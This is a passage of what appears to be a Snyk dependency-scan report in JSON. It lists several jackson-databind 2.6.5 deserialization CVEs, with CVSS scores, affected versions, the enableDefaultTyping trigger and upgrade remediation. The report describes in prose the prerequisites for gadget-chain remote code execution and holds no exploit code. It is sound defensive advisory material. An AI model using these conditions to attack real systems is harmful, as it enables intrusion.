class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", - "epssDetails": { - "percentile": "0.85803", - "probability": "0.01278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-11307" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qr7j-h6gg-jmgc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:14:00.916831Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0, 2.8.11.2)", - "[2.9.0, 2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-10T17:10:58Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:10:50Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:26.624837Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2058", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 5.6, - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.092429Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:31.058577Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:43.326081Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", - "epssDetails": { - "percentile": "0.82708", - "probability": "0.00890", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-12023" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6wqp-v4v6-c87c" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:16:09.944095Z", - "functions_new": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-05-29T17:15:50Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:15:49Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:43.326081Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.637612Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.223431Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:22.234808Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.92634", - "probability": "0.04626", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14718" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-645p-88qh-w398" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:07.540945Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:19:49Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:19:41Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:22.234808Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.195569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.008907Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:33.930153Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", - "epssDetails": { - "percentile": "0.84205", - "probability": "0.01052", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-14720" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-x2w5-5m2g-7h5m" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-10-11T17:21:22.141403Z", - "functions_new": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-27T17:20:17Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-10-11T17:19:17Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:33.930153Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.5)", - "[2.8.0,2.8.11.3)", - "[2.9.0,2.9.7)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.5", - "2.8.11.3", - "2.9.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2097", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", - "title": "GitHub Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:39.120318Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:48.151247Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:51:21.823657Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 